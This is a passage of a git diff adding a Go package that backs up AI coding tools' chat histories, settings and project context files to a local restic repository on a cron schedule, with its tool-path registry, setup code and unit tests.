+ prependFakeBin(t, map[string]string{"restic": fakeResticScript()})
+ err := RunPrune(newRuntimeContext(), BackupConfig{HomeDir: t.TempDir()})
+ require.Error(t, err)
+ assert.Contains(t, err.Error(), "not initialized")
+}
+
+func TestRunBackup_ResticMissing(t *testing.T) {
+ tmp := t.TempDir()
+ dataDir := filepath.Join(tmp, ".claude", "projects")
+ repoPath := filepath.Join(tmp, ResticRepoSubdir)
+ passwordFile := filepath.Join(tmp, ResticPasswordSubdir)
+ require.NoError(t, os.MkdirAll(dataDir, 0755))
+ require.NoError(t, os.WriteFile(filepath.Join(dataDir, "session.jsonl"), []byte("{}\n"), 0644))
+ require.NoError(t, os.MkdirAll(repoPath, 0700))
+ require.NoError(t, os.WriteFile(filepath.Join(repoPath, "config"), []byte("ok"), 0600))
+ require.NoError(t, os.MkdirAll(filepath.Dir(passwordFile), 0700))
+ require.NoError(t, os.WriteFile(passwordFile, []byte("password"), 0400))
+ t.Setenv("PATH", t.TempDir())
+
+ _, err := RunBackup(newRuntimeContext(), BackupConfig{
+ HomeDir: tmp,
+ ExtraScanDirs: []string{},
+ })
+ require.Error(t, err)
+ assert.Contains(t, err.Error(), "restic")
+ assert.ErrorIs(t, err, ErrResticNotInstalled)
+}
+
+func TestRunBackup_ResolveHomeError(t *testing.T) {
+ _, err := RunBackup(newRuntimeContext(), BackupConfig{User: "__missing_user__"})
+ require.Error(t, err)
+ assert.Contains(t, err.Error(), "resolve home directory")
+}
+
+func TestResolveHomeDir_ExistingUserLookup(t *testing.T) {
+ current, err := user.Current()
+ require.NoError(t, err)
+ home, err := resolveHomeDir(current.Username)
+ require.NoError(t, err)
+ assert.NotEmpty(t, home)
+}
+
+func TestAcquireBackupLock_DirectoryError(t *testing.T) {
+ tmp := t.TempDir()
+ parentFile := filepath.Join(tmp, "not-a-dir")
+ require.NoError(t, os.WriteFile(parentFile, []byte("x"), 0600))
+ _, err := acquireBackupLock(filepath.Join(parentFile, "lock"))
+ require.Error(t, err)
+}
+
+func TestReleaseBackupLock_Nil(t *testing.T) {
+ releaseBackupLock(nil)
+}
+
+func TestCollectMatchingFiles_ExcludedDirectory(t *testing.T) {
+ tmp := t.TempDir()
+ require.NoError(t, os.MkdirAll(filepath.Join(tmp, "ignore"), 0755))
+ require.NoError(t, os.WriteFile(filepath.Join(tmp, "ignore", "a.json"), []byte("{}"), 0644))
+ require.NoError(t, os.WriteFile(filepath.Join(tmp, "keep.json"), []byte("{}"), 0644))
+ matches := collectMatchingFiles(tmp, []string{"*.json"}, []string{"ignore"})
+ assert.Equal(t, []string{filepath.Join(tmp, "keep.json")}, matches)
+}
+
+func TestGeneratePassword_WriteFailure(t *testing.T) {
+ tmp := t.TempDir()
+ targetDir := filepath.Join(tmp, "as-dir")
+ require.NoError(t, os.MkdirAll(targetDir, 0700))
+ err := generatePassword(targetDir)
+ require.Error(t, err)
+ assert.Contains(t, err.Error(), "failed to write password file")
+}
+
+func TestUpdateStatus_RenameFailure(t *testing.T) {
+ tmp := t.TempDir()
+ statusDir := filepath.Join(tmp, "status-target")
+ require.NoError(t, os.MkdirAll(statusDir, 0700))
+ updateStatus(newSilentLogger(), statusDir, &BackupResult{SnapshotID: "x"}, nil)
+}
+
+func TestSetup_ResolveHomeFailure(t *testing.T) {
+ _, err := Setup(newRuntimeContext(), ScheduleConfig{
+ BackupConfig: BackupConfig{User: "__missing_user__"},
+ BackupCron: DefaultBackupCron,
+ PruneCron: DefaultPruneCron,
+ })
+ require.Error(t, err)
+ assert.Contains(t, err.Error(), "resolve home directory")
+}
+
+func TestSetup_InitRepoFailure(t *testing.T) {
+ prependFakeBin(t, map[string]string{
+ "restic": fakeResticScript(),
+ "crontab": fakeCrontabScript(),
+ })
+ t.Setenv("FAKE_RESTIC_FAIL", "1")
+ tmp := t.TempDir()
+ t.Setenv("FAKE_CRONTAB_FILE", filepath.Join(tmp, "cron.txt"))
+
+ _, err := Setup(newRuntimeContext(), ScheduleConfig{
+ BackupConfig: BackupConfig{HomeDir: tmp},
+ BackupCron: DefaultBackupCron,
+ PruneCron: DefaultPruneCron,
+ })
+ require.Error(t, err)
+ assert.Contains(t, err.Error(), "initialize restic repository")
+}
+
+func TestConfigureCron_NoCrontabBinary(t *testing.T) {
+ t.Setenv("PATH", t.TempDir())
+ err := configureCron(newRuntimeContext(), ScheduleConfig{}, t.TempDir())
+ require.Error(t, err)
+ assert.Contains(t, err.Error(), "crontab not found")
+}
+
+func TestRunPrune_ResticFailure(t *testing.T) {
+ prependFakeBin(t, map[string]string{"restic": fakeResticScript()})
+ t.Setenv("FAKE_RESTIC_FAIL_FORGET", "1")
+
+ tmp := t.TempDir()
+ repoPath := filepath.Join(tmp, ResticRepoSubdir)
+ passwordFile := filepath.Join(tmp, ResticPasswordSubdir)
+ require.NoError(t, os.MkdirAll(repoPath, 0700))
+ require.NoError(t, os.WriteFile(filepath.Join(repoPath, "config"), []byte("ok"), 0600))
+ require.NoError(t, os.MkdirAll(filepath.Dir(passwordFile), 0700))
+ require.NoError(t, os.WriteFile(passwordFile, []byte("password"), 0400))
+
+ err := RunPrune(newRuntimeContext(), BackupConfig{HomeDir: tmp})
+ require.Error(t, err)
+ assert.Contains(t, err.Error(), "prune failed")
+}
+
+func TestListSnapshots_Success(t *testing.T) {
+ prependFakeBin(t, map[string]string{"restic": fakeResticScript()})
+
+ tmp := t.TempDir()
+ repoPath := filepath.Join(tmp, ResticRepoSubdir)
+ passwordFile := filepath.Join(tmp, ResticPasswordSubdir)
+ require.NoError(t, os.MkdirAll(repoPath, 0700))
+ require.NoError(t, os.WriteFile(filepath.Join(repoPath, "config"), []byte("ok"), 0600))
+ require.NoError(t, os.MkdirAll(filepath.Dir(passwordFile), 0700))
+ require.NoError(t, os.WriteFile(passwordFile, []byte("password"), 0400))
+
+ out, err := ListSnapshots(newRuntimeContext(), BackupConfig{HomeDir: tmp})
+ require.NoError(t, err)
+ assert.Contains(t, out, "ID")
+}
+
+func TestListSnapshots_ResticMissing(t *testing.T) {
+ tmp := t.TempDir()
+ t.Setenv("PATH", t.TempDir())
+
+ _, err := ListSnapshots(newRuntimeContext(), BackupConfig{HomeDir: tmp})
+ require.Error(t, err)
+ assert.ErrorIs(t, err, ErrResticNotInstalled)
+}
+
+func TestListSnapshots_RepoNotInitialized(t *testing.T) {
+ prependFakeBin(t, map[string]string{"restic": fakeResticScript()})
+
+ tmp := t.TempDir()
+ passwordFile := filepath.Join(tmp, ResticPasswordSubdir)
+ require.NoError(t, os.MkdirAll(filepath.Dir(passwordFile), 0700))
+ require.NoError(t, os.WriteFile(passwordFile, []byte("password"), 0400))
+
+ _, err := ListSnapshots(newRuntimeContext(), BackupConfig{HomeDir: tmp})
+ require.Error(t, err)
+ assert.ErrorIs(t, err, ErrRepositoryNotInitialized)
+}
diff --git a/pkg/chatbackup/registry.go b/pkg/chatbackup/registry.go
new file mode 100644
index 000000000..a03275592
--- /dev/null
+++ b/pkg/chatbackup/registry.go
@@ -0,0 +1,332 @@
+// pkg/chatbackup/registry.go
+// Declarative registry of AI coding tools and their data locations
+//
+// RATIONALE: Instead of hardcoding paths in bash scripts, we declare
+// each tool's data locations in Go. This is testable, extensible, and
+// self-documenting. Adding a new tool = adding one entry to the registry.
+//
+// EVIDENCE: The prompts/.claude/skills/store-chats/scripts/backup-chats.sh
+// covers 12 tools but in bash; session_backup.go covers only 2 (Claude, Codex).
+// This registry consolidates and extends both.
+//
+// Sources:
+// - Claude Code: https://docs.anthropic.com/en/docs/claude-code
+// - Codex CLI: https://github.com/openai/codex
+// - VS Code: https://code.visualstudio.com/docs/getstarted/settings
+// - Windsurf: https://docs.codeium.com/windsurf
+// - Continue: https://docs.continue.dev/
+
+package chatbackup
+
+// DefaultToolRegistry returns the full list of AI tool sources to back up.
+// Each entry declares where a tool stores its data and what to include/exclude.
+//
+// Design decision: We back up EVERYTHING that constitutes "AI context" -
+// conversations, settings, memory files, project configs, MCP server configs.
+// This enables the feedback loop described in the task: statistical analysis
+// of prompt engineering and iterative improvement.
+func DefaultToolRegistry() []ToolSource {
+ return []ToolSource{
+ // ─── Claude Code ───────────────────────────────────────────
+ {
+ Name: "claude-code",
+ Description: "Anthropic Claude Code CLI sessions, settings, and memory",
+ Paths: []SourcePath{
+ {
+ Path: "~/.claude/projects",
+ Includes: []string{"*.jsonl", "*.json"},
+ Description: "Session transcripts (JSONL) and session indexes",
+ },
+ {
+ Path: "~/.claude/todos",
+ Description: "Todo lists from coding sessions",
+ },
+ {
+ Path: "~/.claude/file-history",
+ Description: "File modification history across sessions",
+ },
+ {
+ Path: "~/.claude/plans",
+ Description: "Implementation plans from plan mode",
+ },
+ {
+ Path: "~/.claude/settings.json",
+ Includes: []string{"settings.json"},
+ Description: "User settings including permissions, " +
+ "allowed commands",
+ },
+ {
+ Path: "~/.claude/ide",
+ Description: "IDE integration state",
+ },
+ },
+ },
+ // ─── Claude Code Project Memory ────────────────────────────
+ // These are per-project memory files that persist context
+ {
+ Name: "claude-code-memory",
+ Description: "Per-project MEMORY.md files that persist AI context across sessions",
+ Paths: []SourcePath{
+ {
+ Path: "~/.claude/projects",
+ Includes: []string{"MEMORY.md"},
+ Description: "Per-project memory files",
+ },
+ },
+ },
+ // ─── OpenAI Codex CLI ──────────────────────────────────────
+ {
+ Name: "codex",
+ Description: "OpenAI Codex CLI sessions, config, and state",
+ Paths: []SourcePath{
+ {
+ Path: "~/.codex/sessions",
+ Includes: []string{"*.jsonl"},
+ Description: "Session transcripts",
+ },
+ {
+ Path: "~/.codex/config.toml",
+ Description: "Codex CLI configuration",
+ },
+ {
+ Path: "~/.codex/skills",
+ Description: "Codex custom skills",
+ },
+ {
+ Path: "~/.codex/shell_snapshots",
+ Description: "Shell state snapshots",
+ },
+ },
+ },
+ // ─── VS Code / VSCodium ────────────────────────────────────
+ {
+ Name: "vscode",
+ Description: "VS Code user settings and extension state",
+ Paths: []SourcePath{
+ {
+ Path: "~/.config/Code/User/settings.json",
+ Description: "VS Code user settings",
+ },
+ {
+ Path: "~/.config/Code/User/keybindings.json",
+ Description: "VS Code keybindings",
+ },
+ {
+ Path: "~/.config/Code/User/globalStorage/saoudrizwan.claude-dev/tasks",
+ Includes: []string{"*.json"},
+ Description: "Cline (Claude Dev) task history",
+ },
+ {
+ Path: "~/.config/Code/User/globalStorage/RooVeterinaryInc.roo-cline",
+ Includes: []string{"*.json"},
+ Description: "Roo Code task history",
+ },
+ {
+ Path: "~/.config/Code/User/globalStorage/GitHub.copilot-chat",
+ Description: "GitHub Copilot chat history",
+ },
+ },
+ },
+ // ─── Windsurf ──────────────────────────────────────────────
+ {
+ Name: "windsurf",
+ Description: "Windsurf IDE global storage and settings",
+ Paths: []SourcePath{
+ {
+ Path: "~/.config/Windsurf/User/globalStorage",
+ Description: "Windsurf global storage (chat history, state)",
+ },
+ {
+ Path: "~/.config/Windsurf/User/settings.json",
+ Description: "Windsurf user settings",
+ },
+ },
+ },
+ // ─── Cursor ────────────────────────────────────────────────
+ {
+ Name: "cursor",
+ Description: "Cursor IDE settings and chat history",
+ Paths: []SourcePath{
+ {
+ Path: "~/.config/Cursor/User/globalStorage",
+ Includes: []string{"state.vscdb"},
+ Description: "Cursor global state database",
+ },
+ {
+ Path: "~/.config/Cursor/User/settings.json",
+ Description: "Cursor user settings",
+ },
+ },
+ },
+ // ─── Continue ──────────────────────────────────────────────
+ {
+ Name: "continue",
+ Description: "Continue IDE extension sessions and config",
+ Paths: []SourcePath{
+ {
+ Path: "~/.continue/sessions",
+ Includes: []string{"*.json"},
+ Description: "Continue session history",
+ },
+ {
+ Path: "~/.continue/config.json",
+ Description: "Continue configuration",
+ },
+ },
+ },
+ // ─── Amazon Q Developer ────────────────────────────────────
+ {
+ Name: "amazon-q",
+ Description: "Amazon Q Developer (formerly CodeWhisperer) chat history",
+ Paths: []SourcePath{
+ {
+ Path: "~/.aws/amazonq/history",
+ Includes: []string{"*.json"},
+ Description: "Amazon Q chat history",
+ },
+ },
+ },
+ // ─── Aider ─────────────────────────────────────────────────
+ {
+ Name: "aider",
+ Description: "Aider AI coding assistant chat history",
+ Paths: []SourcePath{
+ {
+ Path: "~/.aider.chat.history.md",
+ Description: "Aider global chat history",
+ },
+ },
+ },
+ // ─── OpenClaw ──────────────────────────────────────────────
+ {
+ Name: "openclaw",
+ Description: "OpenClaw self-hosted AI assistant config and sessions",
+ Paths: []SourcePath{
+ {
+ Path: "~/.openclaw/openclaw.json",
+ Description: "OpenClaw configuration file",
+ },
+ {
+ Path: "~/.openclaw/config.yaml",
+ Description: "OpenClaw main config (YAML format)",
+ },
+ {
+ Path: "~/.openclaw/.env",
+ Description: "OpenClaw environment variables (API keys, secrets)",
+ },
+ {
+ Path: "~/.openclaw/workspace/skills",
+ Description: "OpenClaw custom skills",
+ },
+ {
+ Path: "~/.openclaw/sessions",
+ Includes: []string{"*.json", "*.jsonl"},
+ Description: "OpenClaw session transcripts",
+ },
+ },
+ },
+ // ─── Gemini CLI ────────────────────────────────────────────
+ {
+ Name: "gemini-cli",
+ Description: "Google Gemini CLI agent chat history and config",
+ Paths: []SourcePath{
+ {
+ Path: "~/.gemini/tmp",
+ Includes: []string{"shell_history", "*/shell_history"},
+ Description: "Gemini CLI shell history and session checkpoints",
+ },
+ {
+ Path: "~/.gemini/config",
+ Description: "Gemini CLI configuration",
+ },
+ },
+ },
+ // ─── ChatGPT Desktop (Third-Party) ────────────────────────
+ // Multiple third-party ChatGPT desktop apps exist for Linux
+ // We cover the most common ones (lencx/ChatGPT, electron-based)
+ {
+ Name: "chatgpt-desktop",
+ Description: "ChatGPT desktop app (third-party) chat history",
+ Paths: []SourcePath{
+ {
+ Path: "~/.config/ChatGPT",
+ Description: "ChatGPT desktop app config and state",
+ },
+ {
+ Path: "~/.local/share/ChatGPT",
+ Description: "ChatGPT desktop app data storage",
+ },
+ },
+ },
+ // ─── Gemini Desktop (Third-Party) ─────────────────────────
+ {
+ Name: "gemini-desktop",
+ Description: "Gemini desktop app (third-party) chat history",
+ Paths: []SourcePath{
+ {
+ Path: "~/.config/gemini-desktop",
+ Description: "Gemini desktop app config and state",
+ },
+ {
+ Path: "~/.local/share/gemini-desktop",
+ Description: "Gemini desktop app data storage",
+ },
+ },
+ },
+ // ─── Codex Archives ────────────────────────────────────────
+ // Extended coverage for Codex session archives and logs
+ {
+ Name: "codex-archives",
+ Description: "OpenAI Codex archived sessions and exported data",
+ Paths: []SourcePath{
+ {
+ Path: "~/.codex/archives",
+ Description: "Archived Codex sessions",
+ },
+ {
+ Path: "~/.codex/exports",
+ Description: "Exported Codex data",
+ },
+ },
+ },
+ }
+}
+
+// ProjectContextPatterns returns file patterns to scan for in ExtraScanDirs.
+// These are project-level AI context files that live alongside code.
+//
+// RATIONALE: CLAUDE.md, AGENTS.md, project-level .claude/ dirs contain
+// critical AI context. Backing these up enables reconstructing the full
+// AI interaction context for any project.
+func ProjectContextPatterns() []string {
+ return []string{
+ "CLAUDE.md",
+ "AGENTS.md",
+ "QUICK-FACTS.md",
+ ".claude",
+ }
+}
+
+// DefaultExcludes returns patterns that should always be excluded from backups.
+// These are caches, telemetry, and temporary files that waste space.
+func DefaultExcludes() []string {
+ return []string{
+ // Claude Code caches and telemetry
+ ".claude/downloads",
+ ".claude/statsig",
+ ".claude/telemetry",
+ ".claude/cache",
+ ".claude/debug",
+ ".claude/shell-snapshots",
+ // Codex temporary files
+ ".codex/tmp",
+ ".codex/log",
+ ".codex/models_cache.json",
+ // General exclusions
+ "*.tmp",
+ "*.log",
+ "node_modules",
+ ".git",
+ "__pycache__",
+ }
+}
diff --git a/pkg/chatbackup/registry_test.go b/pkg/chatbackup/registry_test.go
new file mode 100644
index 000000000..a6620610f
--- /dev/null
+++ b/pkg/chatbackup/registry_test.go
@@ -0,0 +1,184 @@
+package chatbackup
+
+import (
+ "testing"
+
+ "github.com/stretchr/testify/assert"
+ "github.com/stretchr/testify/require"
+)
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Registry Tests - Validate tool registry completeness and correctness
+// ═══════════════════════════════════════════════════════════════════════════
+
+func TestDefaultToolRegistry_NotEmpty(t *testing.T) {
+ registry := DefaultToolRegistry()
+ require.NotEmpty(t, registry, "registry must contain at least one tool")
+}
+
+func TestDefaultToolRegistry_AllToolsHaveNames(t *testing.T) {
+ registry := DefaultToolRegistry()
+ for i, tool := range registry {
+ assert.NotEmpty(t, tool.Name,
+ "tool at index %d must have a name", i)
+ assert.NotEmpty(t, tool.Description,
+ "tool %q must have a description", tool.Name)
+ }
+}
+
+func TestDefaultToolRegistry_AllToolsHavePaths(t *testing.T) {
+ registry := DefaultToolRegistry()
+ for _, tool := range registry {
+ assert.NotEmpty(t, tool.Paths,
+ "tool %q must have at least one path", tool.Name)
+ for j, sp := range tool.Paths {
+ assert.NotEmpty(t, sp.Path,
+ "tool %q path at index %d must have a path", tool.Name, j)
+ assert.NotEmpty(t, sp.Description,
+ "tool %q path %q must have a description", tool.Name, sp.Path)
+ }
+ }
+}
+
+func TestDefaultToolRegistry_UniqueNames(t *testing.T) {
+ registry := DefaultToolRegistry()
+ seen := make(map[string]bool)
+ for _, tool := range registry {
+ assert.False(t, seen[tool.Name],
+ "duplicate tool name %q in registry", tool.Name)
+ seen[tool.Name] = true
+ }
+}
+
+func TestDefaultToolRegistry_ClaudeCodePresent(t *testing.T) {
+ // RATIONALE: Claude Code is the primary tool. If it's missing, something broke.
+ registry := DefaultToolRegistry()
+ found := false
+ for _, tool := range registry {
+ if tool.Name == "claude-code" {
+ found = true
+
+ // Verify critical paths
+ hasProjects := false
+ hasSettings := false
+ for _, sp := range tool.Paths {
+ if sp.Path == "~/.claude/projects" {
+ hasProjects = true
+ }
+ if sp.Path == "~/.claude/settings.json" {
+ hasSettings = true
+ }
+ }
+ assert.True(t, hasProjects, "claude-code must back up ~/.claude/projects")
+ assert.True(t, hasSettings, "claude-code must back up ~/.claude/settings.json")
+ break
+ }
+ }
+ assert.True(t, found, "claude-code must be in the registry")
+}
+
+func TestDefaultToolRegistry_CodexPresent(t *testing.T) {
+ registry := DefaultToolRegistry()
+ found := false
+ for _, tool := range registry {
+ if tool.Name == "codex" {
+ found = true
+ hasSessionsPath := false
+ for _, sp := range tool.Paths {
+ if sp.Path == "~/.codex/sessions" {
+ hasSessionsPath = true
+ }
+ }
+ assert.True(t, hasSessionsPath, "codex must back up ~/.codex/sessions")
+ break
+ }
+ }
+ assert.True(t, found, "codex must be in the registry")
+}
+
+func TestDefaultToolRegistry_MinimumToolCount(t *testing.T) {
+ // RATIONALE: We support at least 8 tools (per adversarial review finding #6)
+ registry := DefaultToolRegistry()
+ assert.GreaterOrEqual(t, len(registry), 8,
+ "registry should contain at least 8 AI tools (currently: %d)", len(registry))
+}
+
+func TestDefaultToolRegistry_AllPathsUseHomeExpansion(t *testing.T) {
+ registry := DefaultToolRegistry()
+ for _, tool := range registry {
+ for _, sp := range tool.Paths {
+ // All paths should start with ~ or be absolute
+ if sp.Path[0] != '~' && sp.Path[0] != '/' {
+ t.Errorf("tool %q path %q should start with ~ or /",
+ tool.Name, sp.Path)
+ }
+ }
+ }
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Project Context Tests
+// ═══════════════════════════════════════════════════════════════════════════
+
+func TestProjectContextPatterns_NotEmpty(t *testing.T) {
+ patterns := ProjectContextPatterns()
+ require.NotEmpty(t, patterns)
+}
+
+func TestProjectContextPatterns_IncludesCriticalFiles(t *testing.T) {
+ patterns := ProjectContextPatterns()
+ patternSet := make(map[string]bool)
+ for _, p := range patterns {
+ patternSet[p] = true
+ }
+
+ assert.True(t, patternSet["CLAUDE.md"],
+ "must include CLAUDE.md")
+ assert.True(t, patternSet["AGENTS.md"],
+ "must include AGENTS.md")
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Default Excludes Tests
+// ═══════════════════════════════════════════════════════════════════════════
+
+func TestDefaultExcludes_NotEmpty(t *testing.T) {
+ excludes := DefaultExcludes()
+ require.NotEmpty(t, excludes)
+}
+
+func TestDefaultExcludes_ExcludesTelemetry(t *testing.T) {
+ excludes := DefaultExcludes()
+ found := false
+ for _, e := range excludes {
+ if e == ".claude/telemetry" {
+ found = true
+ break
+ }
+ }
+ assert.True(t, found, "must exclude .claude/telemetry (privacy)")
+}
+
+func TestDefaultExcludes_ExcludesCache(t *testing.T) {
+ excludes := DefaultExcludes()
+ found := false
+ for _, e := range excludes {
+ if e == ".claude/cache" {
+ found = true
+ break
+ }
+ }
+ assert.True(t, found, "must exclude .claude/cache (transient data)")
+}
+
+func TestDefaultExcludes_ExcludesNodeModules(t *testing.T) {
+ excludes := DefaultExcludes()
+ found := false
+ for _, e := range excludes {
+ if e == "node_modules" {
+ found = true
+ break
+ }
+ }
+ assert.True(t, found, "must exclude node_modules")
+}
diff --git a/pkg/chatbackup/setup.go b/pkg/chatbackup/setup.go
new file mode 100644
index 000000000..71ae498f3
--- /dev/null
+++ b/pkg/chatbackup/setup.go
@@ -0,0 +1,349 @@
+// pkg/chatbackup/setup.go
+// Setup and scheduling for automated chat backups
+//
+// Follows Assess → Intervene → Evaluate pattern:
+// ASSESS: Check restic, check existing setup, check dependencies
+// INTERVENE: Init repo, generate password, configure cron
+// EVALUATE: Verify setup, report results
+//
+// RATIONALE: Extracted from the 1,605-line session_backup.go monolith.
+// This focuses solely on setup/scheduling, separate from backup execution.
+
+package chatbackup
+
+import (
+ "context"
+ "fmt"
+ "os"
+ "os/exec"
+ "path/filepath"
+ "strings"
+
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/crypto"
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/eos_io"
+ "github.com/uptrace/opentelemetry-go-extra/otelzap"
+ "go.uber.org/zap"
+)
+
+// Setup initializes the chat archive infrastructure: restic repo, password, and cron.
+//
+// ASSESS: Check restic installed, check if already set up
+// INTERVENE: Create repo, generate password, configure cron
+// EVALUATE: Verify and report
+func Setup(rc *eos_io.RuntimeContext, config ScheduleConfig) (*ScheduleResult, error) {
+ logger := otelzap.Ctx(rc.Ctx)
+
+ result := &ScheduleResult{
+ Warnings: []string{},
+ }
+
+ // ASSESS: Resolve home directory
+ homeDir := config.HomeDir
+ if homeDir == "" {
+ var err error
+ homeDir, err = resolveHomeDir(config.User)
+ if err != nil {
+ return nil, &opError{Op: "resolve home directory", Err: err}
+ }
+ }
+
+ repoPath := filepath.Join(homeDir, ResticRepoSubdir)
+ passwordFile := filepath.Join(homeDir, ResticPasswordSubdir)
+ resticDir := filepath.Dir(repoPath)
+
+ result.RepoPath = repoPath
+ result.PasswordFile = passwordFile
+ result.BackupCron = config.BackupCron
+ result.PruneCron = config.PruneCron
+
+ logger.Info("Setting up chat archive backup",
+ zap.String("user", config.User),
+ zap.String("repo", repoPath),
+ zap.String("backup_cron", config.BackupCron),
+ zap.String("prune_cron", config.PruneCron),
+ zap.Bool("dry_run", config.DryRun))
+
+ if config.DryRun {
+ logger.Info("DRY RUN: Would set up chat archive backup",
+ zap.String("repo", repoPath),
+ zap.String("password_file", passwordFile))
+ return result, nil
+ }
+
+ // ASSESS: Check restic
+ if err := ensureRestic(rc); err != nil {
+ return nil, err
+ }
+
+ // INTERVENE: Create directories
+ if err := os.MkdirAll(resticDir, ResticDirPerm); err != nil {
+ return nil, fmt.Errorf("failed to create directory %s: %w", resticDir, err)
+ }
+
+ // INTERVENE: Generate password if needed (only on first setup)
+ if _, err := os.Stat(passwordFile); os.IsNotExist(err) {
+ if err := generatePassword(passwordFile); err != nil {
+ return nil, fmt.Errorf("failed to generate repository password: %w", err)
+ }
+ result.PasswordGenerated = true
+ logger.Info("Generated restic repository password",
+ zap.String("file", passwordFile))
+ } else {
+ logger.Info("Password file already exists, reusing",
+ zap.String("file", passwordFile))
+ }
+
+ // INTERVENE: Initialize restic repository (idempotent)
+ if err := initRepo(rc, repoPath, passwordFile); err != nil {
+ return nil, fmt.Errorf("failed to initialize restic repository: %w", err)
+ }
+
+ // INTERVENE: Configure cron
+ if err := configureCron(rc, config, homeDir); err != nil {
+ result.Warnings = append(result.Warnings,
+ fmt.Sprintf("Failed to configure cron: %v", err))
+ logger.Warn("Cron configuration failed", zap.Error(err))
+ } else {
+ result.CronConfigured = true
+ }
+
+ // INTERVENE: Fix ownership if running as root for another user
+ if os.Geteuid() == 0 && config.User != "" && config.User != "root" {
+ if err := chownToUser(resticDir, config.User); err != nil {
+ logger.Warn("Failed to change ownership",
+ zap.String("path", resticDir),
+ zap.Error(err))
+ }
+ }
+
+ // EVALUATE: Log completion
+ logger.Info("Chat archive setup completed",
+ zap.Bool("cron_configured", result.CronConfigured),
+ zap.Bool("password_generated", result.PasswordGenerated),
+ zap.String("repo", repoPath))
+
+ if result.PasswordGenerated {
+ logger.Info("IMPORTANT: Your restic password is stored at: " + passwordFile)
+ logger.Info("View it with: cat " + passwordFile)
+ logger.Info("If lost, your backups will be UNRECOVERABLE")
+ }
+
+ return result, nil
+}
+
+// ensureRestic checks if restic is installed and offers to install if missing.
+func ensureRestic(rc *eos_io.RuntimeContext) error {
+ logger := otelzap.Ctx(rc.Ctx)
+
+ if _, err := exec.LookPath("restic"); err == nil {
+ logger.Debug("restic is installed")
+ return nil
+ }
+
+ logger.Warn("restic not found", zap.String("hint", "install with: sudo apt install restic"))
+ return fmt.Errorf("%w", ErrResticNotInstalled)
+}
+
+// generatePassword creates a secure password file.
+func generatePassword(passwordFile string) error {
+ password, err := crypto.GenerateURLSafePassword(PasswordLength)
+ if err != nil {
+ return fmt.Errorf("failed to generate password: %w", err)
+ }
+
+ parentDir := filepath.Dir(passwordFile)
+ if err := os.MkdirAll(parentDir, ResticDirPerm); err != nil {
+ return fmt.Errorf("failed to create directory %s: %w", parentDir, err)
+ }
+
+ if err := os.WriteFile(passwordFile, []byte(password), PasswordFilePerm); err != nil {
+ return fmt.Errorf("failed to write password file: %w", err)
+ }
+
+ return nil
+}
+
+// initRepo initializes a restic repository (idempotent).
+func initRepo(rc *eos_io.RuntimeContext, repoPath, passwordFile string) error {
+ logger := otelzap.Ctx(rc.Ctx)
+
+ // Check if already initialized
+ if err := checkRepoInitialized(rc.Ctx, repoPath, passwordFile); err == nil {
+ logger.Info("Restic repository already initialized",
+ zap.String("repo", repoPath))
+ return nil
+ }
+
+ // Create directory
+ if err := os.MkdirAll(repoPath, RepoDirPerm); err != nil {
+ return fmt.Errorf("failed to create repository directory %s: %w", repoPath, err)
+ }
+
+ // Initialize
+ logger.Info("Initializing restic repository",
+ zap.String("repo", repoPath))
+
+ initCtx, cancel := context.WithTimeout(rc.Ctx, ResticCommandTimeout)
+ defer cancel()
+
+ cmd := exec.CommandContext(initCtx, "restic",
+ "-r", repoPath,
+ "--password-file", passwordFile,
+ "init")
+ output, err := cmd.CombinedOutput()
+ if err != nil {
+ return fmt.Errorf("failed to initialize restic repository: %w\nOutput: %s", err, string(output))
+ }
+
+ logger.Info("Restic repository initialized",
+ zap.String("repo", repoPath))
+ return nil
+}
+
+// configureCron sets up cron jobs for backup and prune.
+func configureCron(rc *eos_io.RuntimeContext, config ScheduleConfig, homeDir string) error {
+ logger := otelzap.Ctx(rc.Ctx)
+
+ if _, err := exec.LookPath("crontab"); err != nil {
+ return fmt.Errorf("crontab not found: %w", err)
+ }
+
+ // Get current crontab
+ var existingCron string
+ crontabCmd := exec.Command("crontab", "-l")
+ if config.User != "" && config.User != "root" && os.Geteuid() == 0 {
+ crontabCmd = exec.Command("crontab", "-u", config.User, "-l")
+ }
+ if output, err := crontabCmd.Output(); err == nil {
+ existingCron = string(output)
+ }
+
+ // Remove existing chat-archive entries (idempotent reconfiguration)
+ lines := strings.Split(existingCron, "\n")
+ var cleanedLines []string
+ for _, line := range lines {
+ if strings.Contains(line, CronMarker) {
+ continue
+ }
+ cleanedLines = append(cleanedLines, line)
+ }
+ existingCron = strings.Join(cleanedLines, "\n")
+
+ // Build the eos backup chats command
+ eosBin, err := os.Executable()
+ if err != nil {
+ eosBin = "/usr/local/bin/eos"
+ }
+ eosBin = shellQuote(eosBin)
+
+ userArg := ""
+ if config.User != "" {
+ userArg = " --user " + shellQuote(config.User)
+ }
+
+ // Add new cron entries
+ cronEntries := fmt.Sprintf(
+ "\n# %s: hourly chat archive backup\n"+
+ "%s %s backup chats%s 2>&1 | logger -t %s\n"+
+ "# %s: daily chat archive prune\n"+
+ "%s %s backup chats --prune%s 2>&1 | logger -t %s\n",
+ CronMarker, config.BackupCron, eosBin, userArg, CronMarker,
+ CronMarker, config.PruneCron, eosBin, userArg, CronMarker,
+ )
+
+ newCron := strings.TrimRight(existingCron, "\n") + cronEntries
+
+ // Install crontab
+ installCmd := exec.Command("crontab", "-")
+ if config.User != "" && config.User != "root" && os.Geteuid() == 0 {
+ installCmd = exec.Command("crontab", "-u", config.User, "-")
+ }
+ installCmd.Stdin = strings.NewReader(newCron)
+
+ if output, err := installCmd.CombinedOutput(); err != nil {
+ return fmt.Errorf("failed to install crontab: %w (output: %s)", err, string(output))
+ }
+
+ logger.Info("Configured cron jobs for chat archive",
+ zap.String("backup_schedule", config.BackupCron),
+ zap.String("prune_schedule", config.PruneCron))
+
+ return nil
+}
+
+// RunPrune applies the retention policy to the restic repository.
+func RunPrune(rc *eos_io.RuntimeContext, config BackupConfig) error {
+ logger := otelzap.Ctx(rc.Ctx)
+
+ homeDir, err := resolveHomeDir(config.User)
+ if config.HomeDir != "" {
+ homeDir = config.HomeDir
+ err = nil
+ }
+ if err != nil {
+ return &opError{Op: "resolve home directory", Err: err}
+ }
+
+ repoPath := filepath.Join(homeDir, ResticRepoSubdir)
+ passwordFile := filepath.Join(homeDir, ResticPasswordSubdir)
+
